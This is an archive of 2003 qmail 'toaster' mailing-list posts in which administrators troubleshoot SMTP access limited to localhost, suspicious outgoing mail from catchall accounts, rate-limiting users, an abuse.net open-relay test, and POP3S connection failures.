Charles, Who is your ISP? Recently Cox, and others have started blocking outgoing port 25 connections to everything except for their servers. This would be a pretty good explanation as to why it suddenly stopped working. Hope this helps, Peter -Original Message- From: Charles Jones [mailto:[EMAIL PROTECTED] Sent: Thursday, June 19, 2003 10:17 PM To: [EMAIL PROTECTED] Subject: [toaster] HELP...Toaster only accepting smtp connects from localhost :( First I would like to say thanks for putting together such an easy to install package. The directions were concise and the end result was my toaster was up and working great. But somehow...today it isn't. Here are the symptoms: I can connect to anything from localhost, including webmail. I can use sqwebmail to send a message to myself and I get it. I can telnet to localhost 25 and the smtpd responds. However telnetting to it from anywhere outside the network fails (IT WAS WORKING YESTERDAY!). I'm hoping I have provided enough info here that should help someone spot my problem. If you need to know anything else just say the word. Here is the contents of my control files, with the actual domain names changed to test [EMAIL PROTECTED] [/var/qmail/control]# cat locals mail.test.com [EMAIL PROTECTED] [/var/qmail/control]# cat me mail.test.com [EMAIL PROTECTED] [/var/qmail/control]# cat virtualdomains test.com:test.com test2.com:test2.com test.info:test.info anothertest.com:anothertest.com [EMAIL PROTECTED] [/var/qmail/control]# cat rcpthosts test1.com:test1.com test2.com:test2.com test.info:test.info anothertest.com:anothertest.com mail.test.com [EMAIL PROTECTED] [/var/qmail/control]# cat me mail.test.com Running processes: root 15428 0.0 0.0 1284 308 ?S21:44 0:00 supervise qmail-send qmails 15430 0.0 0.0 1336 364 ?S21:44 0:00 [qmail-send] qmaill 15431 0.0 0.0 1296 300 ?S21:44 0:00 /usr/local/bin/multilog t /var/log/qmail root 15432 0.0 0.0 1284 308 ?S21:44 0:00 supervise qmail-smtpd root 15434 0.0 0.0 1284 308 ?S21:44 0:00 supervise qmail-pop3d qmaill 15437 0.0 0.0 1296 296 ?S21:44 0:00 /usr/local/bin/multilog t /var/log/qmail/smtpd root 15439 0.0 0.0 1300 304 ?S21:44 0:00 qmail-lspawn ./Maildir/ qmailr 15440 0.0 0.0 1296 292 ?S21:44 0:00 [qmail-rspawn] root 15444 0.0 0.0 1280 304 ?S21:44 0:00 supervise qmail-pop3ds qmailq 15446 0.0 0.0 1288 316 ?S21:44 0:00 [qmail-clean] qmaill 15450 0.0 0.0 1292 296 ?S21:44 0:00 multilog t /var/log/qmail/pop3d qmaill 15452 0.0 0.0 1292 296 ?S21:44 0:00 multilog t /var/log/qmail/pop3ds root 16068 0.0 0.1 1700 604 pts/3R22:06 0:00 grep qmail root 15429 0.0 0.0 1284 308 ?S21:44 0:00 supervise log root 15433 0.0 0.0 1284 308 ?S21:44 0:00 supervise log vpopmail 15436 0.0 0.0 1352 472 ?S21:44 0:00 [tcpserver] vpopmail 15441 0.0 0.0 1312 328 ?S21:44 0:00 [tcpserver] root 15443 0.0 0.0 1280 304 ?S21:44 0:00 supervise log root 15445 0.0 0.0 1280 304 ?S21:44 0:00 supervise log vpopmail 15451 0.0 0.0 1304 324 ?S21:44 0:00 [tcpserver] root 15424 0.0 0.1 2076 1012 ?S21:44 0:00 /bin/sh /command/svscanboot root 15426 0.0 0.0 1324 316 ?S21:44 0:00 svscan /service root 15427 0.0 0.0 1276 264 ?S21:44 0:00 readproctitle service errors: [EMAIL PROTECTED] [/var/qmail/control]# telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 mail.test.com ESMTP quit 221 mail.test.com Connection closed by foreign host. From external host: $ telnet mail.test.com 25 Trying x.x.x.x... (time passes, I give up) ^C $ [EMAIL PROTECTED] [/var/qmail/control]# cat /etc/tcp.smtp ## To update this database type tcprules tcp.smtp.cdb tcp.smtp.tmp tcp.smtp 127.0.0.1:allow,RELAYCLIENT= [EMAIL PROTECTED] [~]# /sbin/iptables -L Chain INPUT (policy ACCEPT) target prot opt source destination Chain FORWARD (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination Chain acctboth (0 references) target prot opt source destination
[toaster] Disturbing Logs
Hi All, Have another quick question for the list regarding some outgoing mail I have found in my log files that worries me: @40003ed69e020fb9a08c new msg 213846 @40003ed69e020fb9db24 info msg 213846: bytes 1218 from [EMAIL PROTECTED] qp 19758 uid 514 @40003ed69e021112f2e4 starting delivery 2368: msg 213846 to remote [EMAIL PROTECTED] @40003ed69e02111344ec status: local 0/10 remote 1/20 @40003ed69e032b2b5a7c delivery 2368: success: 216.103.215.80_accepted_messag e./Remote_host_said:_250_2.6.0_[EMAIL PROTECTED]_Queued_mail_for_delivery/ @40003ed69e032b2bcbc4 status: local 0/10 remote 0/20 @40003ed69e032b2bdf4c end msg 213846 The message appears to be coming from my server and is being delivered to an external server that is not being hosted by my server. The local account that QMail is claiming the mail is being sent from is not even a valid POP3 account. Any ideas? Peter Maag
RE: [toaster] Disturbing Logs
Tom, Looking through my logs it seems that a number of domains are doing what the original domain address is doing. In every case the from address(that claims to be from my server) is not a valid address on my server. It seems that someone has found a way to compromise the catchall setting in vpopmail, as the domains in question all have a catchall mail account. Does anyone have any idea how this can be stopped while still having catch all support? Peter -Original Message- From: Tom Collins [mailto:[EMAIL PROTECTED]] Sent: Thursday, May 29, 2003 6:02 PM To: [EMAIL PROTECTED] Subject: Re: [toaster] Disturbing Logs On Thursday, May 29, 2003, at 05:05 PM, Peter Maag wrote: The message appears to be coming from my server and is being delivered to an external server that is not being hosted by my server.The local account that QMail is claiming the mail is being sent from is not even a valid POP3 account. Try `grep -ri email.domain.com /home/vpopmail/domains` (where the address in your log that the message went to is [EMAIL PROTECTED]) to see if the address in question is a forwarding address on any account you host. It is possible that it's a remote catchall, and could get listed in the log that way. -- Tom Collins [EMAIL PROTECTED]
[toaster] Fighting SPAM
Bill and Others, I am paranoid about people using my server as a relay, andam considering having users use there ISPs SMTP server for outgoing mail. What I would like to do is to monitor the amount of mail the server is sending at any given moment in time. If a user is sending more mail than a predefined limit, I would like to turn off their relay access to the server via IPTables, etc. Currently, the server is running the latest toaster patch, and is only supporting around 15 users. These users use plain POP authentication for checking their mail. Obviously the server is using POP before SMTP to authenticate users. The reason I am concerned is that POP is unencrypted. So, is there any way I can block the amount of mail a user can send in a given amount of time(perhaps 50messages/hour)? If not, how would you monitor the mail leaving the server? I would think this would be a pretty fair allotment for my average user base. Any suggestions? Thanks again for the help. Peter Maag
Re: [toaster] Open Relay
Bill, The tool is located at: http://www.abuse.net/relay.html . Here is the output from the actual test.(my domain name has been replaced with test.com) 220 mail.test.com ESMTP HELO www.abuse.net 250 mail.test.com Relay test 1 RSET 250 flushed MAIL FROM:[EMAIL PROTECTED] 250 ok RCPT TO:[EMAIL PROTECTED] 250 ok DATA 354 go ahead (message body) 250 ok 1045679681 qp 25778 The e-mail address the e-mail was sent to was on the same server(test.com). The message successfully makes it into my inbox. Thanks again for the help Bill. Peter = Original Message From Bill Shupp [EMAIL PROTECTED] = On Tuesday, February 18, 2003, at 11:06 PM, Peter Maag wrote: Hey All, Was testing one of my toaster boxes today with Abuse.net’s relay tester(http://www.abuse.net/relay) This is not a valid URL. Where is this tool? , and it was able to successfully deliver an open relay message to me.(It actually sent a message). Here is the test result: Connecting to ** for registered user test ... 220 *** ESMTP HELO www.abuse.net 250 *** Relay test 1 RSET 250 flushed MAIL FROM:[EMAIL PROTECTED] 250 ok RCPT TO:** 250 ok DATA 354 go ahead (message body) 250 ok 1045638142 qp 20315 Relay test result Hmmn, at first glance, host appeared to accept a message for relay. THIS MAY OR MAY NOT MEAN THAT IT'S AN OPEN RELAY. The message was indeed delivered to the target address. I reread the toaster, and everything is installed just like it should be except for Courier IMAP, which I don’t think should make a difference. My /var/qmail/control/rcpthosts file contains just the domains the server should be hosting, and /home/vpopmail/etc/tcp.smtp contains just the one line that should be echo’d there during install. Any ideas?? Not with the envelope address and hostnames censored. Without that information, it's hard to tell what was tested. Bill On Wed, 2003-02-19 at 09:58, Bill Shupp wrote: On Tuesday, February 18, 2003, at 11:06 PM, Peter Maag wrote: Hey All, Was testing one of my toaster boxes today with Abuse.net’s relay tester(http://www.abuse.net/relay) This is not a valid URL. Where is this tool? , and it was able to successfully deliver an open relay message to me.(It actually sent a message). Here is the test result: Connecting to ** for registered user test ... 220 *** ESMTP HELO www.abuse.net 250 *** Relay test 1 RSET 250 flushed MAIL FROM:[EMAIL PROTECTED] 250 ok RCPT TO:** 250 ok DATA 354 go ahead (message body) 250 ok 1045638142 qp 20315 Relay test result Hmmn, at first glance, host appeared to accept a message for relay. THIS MAY OR MAY NOT MEAN THAT IT'S AN OPEN RELAY. The message was indeed delivered to the target address. I reread the toaster, and everything is installed just like it should be except for Courier IMAP, which I don’t think should make a difference. My /var/qmail/control/rcpthosts file contains just the domains the server should be hosting, and /home/vpopmail/etc/tcp.smtp contains just the one line that should be echo’d there during install. Any ideas?? Not with the envelope address and hostnames censored. Without that information, it's hard to tell what was tested. Bill
[toaster] Open Relay
Hey All, Was testing one of my toaster boxes today with Abuse.nets relay tester(http://www.abuse.net/relay) , and it was able to successfully deliver an open relay message to me.(It actually sent a message). Here is the test result: Connecting to ** for registered user test ... 220***ESMTP HELOwww.abuse.net 250*** Relay test 1 RSET 250flushed MAILFROM:[EMAIL PROTECTED] 250ok RCPTTO:** 250ok DATA 354goahead (messagebody) 250ok1045638142qp20315 Relay test result Hmmn, at first glance, host appeared to accept a message for relay. THIS MAY OR MAY NOT MEAN THAT IT'S AN OPEN RELAY. The message was indeed delivered to the target address. I reread the toaster, and everything is installed just like it should be except for Courier IMAP, which I dont think should make a difference. My /var/qmail/control/rcpthosts file contains just the domains the server should be hosting, and /home/vpopmail/etc/tcp.smtp contains just the one line that should be echod there during install. Any ideas?? Thanks for the help. Peter
[toaster] POP3S Not Working
Hey all, I installed the toaster per Bills excellent set of directions. I would like to use POP3S, however all connections to that port get refused. An nstat nlp shows that POP3S is there and appears to be running. I also turned off iptables on the machine just in case. There is no firewall in front of the machine. So, what is the easiest way I can check to make sure that POP3S is in working order? Thanks for the help. Peter